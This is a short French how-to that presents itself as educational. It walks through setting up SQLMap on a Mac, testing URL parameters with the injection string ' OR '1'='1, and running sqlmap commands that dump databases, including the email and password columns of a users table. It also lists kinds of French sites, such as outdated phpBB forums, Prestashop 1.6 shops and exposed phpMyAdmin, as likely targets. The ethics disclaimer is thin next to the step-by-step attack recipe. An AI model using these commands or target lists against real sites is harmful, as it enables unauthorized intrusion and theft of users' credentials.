GUIDE EDUCATIF : DUMP DE SITES VULNERABLES (MACOS)
1. Qu'est-ce qu'un dump ?
Un 'dump' designe l'extraction massive de donnees depuis une base SQL, souvent suite a une
vulnerabilite comme une injection SQL. Cela peut inclure des emails, mots de passe, numeros, etc.
2. Objectifs pedagogiques
Ce guide explique comment fonctionne une extraction de donnees a des fins educatives et de
securite personnelle. Il est destine a comprendre comment se defendre, pas a attaquer.
3. Preparation de lenvironnement (sur Mac)
- Telecharger XAMPP : https://www.apachefriends.org/fr/index.html
- Installer Python via Homebrew : brew install python
- Installer SQLMap : pip install sqlmap
- Verifier que Apache et MySQL sont actives dans XAMPP
4. Identifier une cible vulnerable (exemples generiques)
- URL classique : https://site.com/page.php?id=5
- Test dinjection : https://site.com/page.php?id=5' OR '1'='1
- Si ca affiche plus de donnees que prevu -> potentiellement vulnerable
5. Utiliser SQLMap (base)
Commande simple :
sqlmap -u "https://site.com/page.php?id=5" --batch --dump
Commande avancee :
sqlmap -u "https://site.com/page.php?id=5" -D dbname -T users -C email,password --dump
6. Resultat typique dun dump
- email:
[email protected]- email:
[email protected]- password: hash SHA1 ou en clair
Les donnees peuvent etre exportees automatiquement par SQLMap dans des fichiers .txt ou .csv.
7. Plateformes d'entranement 100% legales
- DVWA : Damn Vulnerable Web App
- bWAPP : Buggy Web Application
- HackTheBox / TryHackMe
- Root-Me.org (francais)
8. Outils complementaires
- SQLMap : automatisation des injections
- BurpSuite : proxy danalyse
- Firefox + HackBar : extensions de tests
- Postman : pour manipuler les requetes HTTP
9. Exemples de sites francais historiquement vulnerables (a des fins de
sensibilisation)
- Anciens forums PHPBB non mis a jour
- Petites boutiques Prestashop 1.6 sans filtrage
- CMS obsoletes type Joomla 2.x ou WordPress avec plugins exposes
- Petits hebergeurs OVH mutualises exposant phpMyAdmin en public
10. Mentions legales et ethique
Ce document est fourni a des fins pedagogiques. Toute tentative de scan, test ou extraction de
donnees sans autorisation explicite constitue une infraction penale.
Utilisez ces connaissances pour defendre vos projets, faire de laudit ou apprendre via des
plateformes prevues a cet effet.